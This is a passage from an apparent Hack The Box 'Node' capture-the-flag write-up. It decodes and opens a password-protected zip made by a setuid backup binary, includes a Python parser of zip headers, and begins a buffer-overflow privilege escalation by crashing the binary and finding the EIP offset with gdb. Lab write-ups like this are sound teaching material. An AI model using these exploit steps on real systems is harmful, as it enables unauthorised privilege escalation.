UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
The encoded output is saved to output.b64 and decoded:

u505@kali:~/HTB/Machines/Node$ cat output.b64 | base64 -d > output
u505@kali:~/HTB/Machines/Node$ file output
output: Zip archive data, at least v?[0x333] to extract
u505@kali:~/HTB/Machines/Node$ mv output output.zip
u505@kali:~/HTB/Machines/Node$ unzip output.zip
Archive:  output.zip
   skipping: root.txt                need PK compat. v5.1 (can do v4.6)

The odd "version needed" value and the skip come from the entry's local header: its compression-method field is 99, the WinZip AES marker, rather than deflate with the classic PKWARE encryption bit that the first backup used, and the unzip shipped with Kali has no AES support. 7z (p7zip) does, and the password is the magicword the binary passes to zip:
u505@kali:~/HTB/Machines/Node$ 7z e output.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz (506E3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)

Extracting archive: output.zip
--
Path = output.zip
Type = zip
Physical Size = 1141

Enter password (will not be echoed): magicword
Everything is Ok

Size:       2584
Compressed: 1141

The extracted root.txt is not the flag but a troll face:
u505@kali:~/HTB/Machines/Node$ cat root.txt QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ QQQQQQQP'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ QQQQQP'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^ ` ]6QQ' yQQQQQ QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . 
_ssawmQQQQQQk 3QQQQWQ QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
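An added example, my own code rather than the author's, covering both archives on this page: a small parser for zip local file headers, run on the first 138 bytes of myplace.backup (taken from the head output earlier) and on the first 51 bytes of the archive the binary emitted for /root/. It shows why the first archive is a job for zip2john (encryption flag set with method 8, the classic PKWARE scheme) and why unzip skips root.txt in the second (method 99 with a WinZip AE-2 extra record, which needs 7z). The function names are mine; the two base64 prefixes are copied from the output above, and the 2584-byte uncompressed size the parser reports for root.txt is the value 7z printed.

```python
import base64
import struct

LOCAL_SIG = b"PK\x03\x04"
AES_EXTRA_ID = 0x9901   # WinZip AE-x extra-field header id
METHOD_AES = 99         # "compression method" value that marks an AE-x encrypted entry

# First 184 base64 characters (138 bytes) of myplace.backup, copied from the head output above.
MYPLACE_B64 = (
    "UEsDBAoAAAAAAHtvI0sAAAAAAAAAAAAAAAAQABwAdmFyL3d3dy9teXBsYWNl"
    "L1VUCQADyfyrWTAlv151eAsAAQQAAAAABAAAAABQSwMEFAAJAAgARQEiS0x9"
    "7zc0EQAAEFMAACEAHAB2YXIvd3d3L215cGxhY2UvcGFja2FnZS1sb2NrLmpz"
    "b25V"
)
# First 68 base64 characters (51 bytes) of the archive the binary emitted for /root/.
TROLL_B64 = "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbB"


def parse_aes_extra(extra):
    """Return the AE-x record from a local-header extra field, or None if there is none."""
    pos = 0
    while pos + 4 <= len(extra):
        ext_id, size = struct.unpack_from("<HH", extra, pos)
        body = extra[pos + 4:pos + 4 + size]
        if ext_id == AES_EXTRA_ID and len(body) >= 7:
            ae_version, vendor, strength, real_method = struct.unpack("<H2sBH", body[:7])
            return {"ae_version": ae_version, "vendor": vendor.decode("ascii"),
                    "key_bits": {1: 128, 2: 192, 3: 256}.get(strength),
                    "real_method": real_method}   # compression actually applied under the AES layer
        pos += 4 + size
    return None


def walk_local_headers(blob):
    """Parse consecutive local file headers from the start of a (possibly truncated) zip."""
    entries = []
    off = 0
    while off + 30 <= len(blob) and blob[off:off + 4] == LOCAL_SIG:
        (_sig, version, flags, method, _mtime, _mdate, _crc,
         csize, usize, nlen, xlen) = struct.unpack_from("<4sHHHHHIIIHH", blob, off)
        name = blob[off + 30:off + 30 + nlen].decode("utf-8", "replace")
        extra = blob[off + 30 + nlen:off + 30 + nlen + xlen]
        entries.append({
            "name": name,
            "version_needed": version,        # unzip reports only the low byte, as major.minor
            "encrypted": bool(flags & 0x0001),
            "method": method,                 # 0 stored, 8 deflate, 99 AES
            "aes": parse_aes_extra(extra),
            "csize": csize,
            "usize": usize,
        })
        if csize == 0 and flags & 0x0008:
            break   # sizes live in a trailing data descriptor; the next header cannot be located
        off += 30 + nlen + xlen + csize
    return entries


def entries_from_base64(b64):
    return walk_local_headers(base64.b64decode(b64))


def encryption_scheme(entry):
    """Name the scheme an entry uses and the tool that can attack or open it."""
    if not entry["encrypted"]:
        return "none"
    aes = entry["aes"]
    if entry["method"] == METHOD_AES and aes:
        return "WinZip AES-%d (AE-%d): 7z; Info-ZIP unzip skips it" % (aes["key_bits"], aes["ae_version"])
    return "traditional PKWARE ZipCrypto: zip2john + john"


if __name__ == "__main__":
    for label, b64 in (("myplace.backup", MYPLACE_B64), ("backup of /root/", TROLL_B64)):
        print(label)
        for e in entries_from_base64(b64):
            print("  %r: method=%d version=%#x size=%d encryption=%s"
                  % (e["name"], e["method"], e["version_needed"], e["usize"], encryption_scheme(e)))
```

The parser stops as soon as it cannot reach the next header, which is what happens with truncated input and with entries that defer their sizes to a data descriptor; for the two prefixes above that is exactly the directory entry plus package-lock.json, and root.txt respectively.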
Privilege escalation
Buffer overflow
If the third argument is a thousand D's, the program crashes:
u505@kali:~/HTB/Machines/Node$ ./backupnode -a 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python -c "print 'D'*1000"`
[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD Segmentation fault u505@kali:~/HTB/Machines/Node$ sudo tail -n 2 /var/log/syslog May 20 17:50:29 kali kernel: [101469.038428] backupnode[8790]: segfault at 44444444 ip 0000000044444444 sp 00000000fff77c70 error 14 in libc-2.30.so[f7d3c000+1d000] May 20 17:50:29 kali kernel: [101469.038434] Code: Bad RIP value.
The EIP register has the value 44444444, which corresponds to DDDD.
Offset determination
The pattern produced by PEDA's built-in pattern creator contains characters the program does not allow.
gdb-peda$ pattern create 1000 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'
The Metasploit pattern generator does not use any of the prohibited characters.
u505@kali:~/HTB/Machines/Node$ /usr/bin/msf-pattern_create -l 1000 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B u505@kali:~/HTB/Machines/Node$ gdb backupnode GNU gdb (Debian 9.1-3) 9.1 Copyright (C) 2020 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>.
For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from backupnode... (No debugging symbols found in backupnode) (gdb) init-peda gdb-peda$ r abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B Starting program: /opt/HTB/Machines/Node/backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
[Secure Backup v1.0 ASCII-art banner]
[+] Validated access token [+] Starting archiving Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x40b EBX: 0xffec7ce0 --> 0x4 ECX: 0x0 EDX: 0x804938b --> 0x712d00 () ESI: 0xf7f7e000 --> 0x1dfd6c EDI: 0xffec7c2f --> 0x796500 () EBP: 0x72413971 ('q9Ar') ESP: 0xffec6c00 ("Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax"...) EIP: 0x31724130 ('0Ar1') EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x31724130 [------------------------------------stack-------------------------------------] 0000| 0xffec6c00 ("Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax"...) 0004| 0xffec6c04 ("r3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9"...) 0008| 0xffec6c08 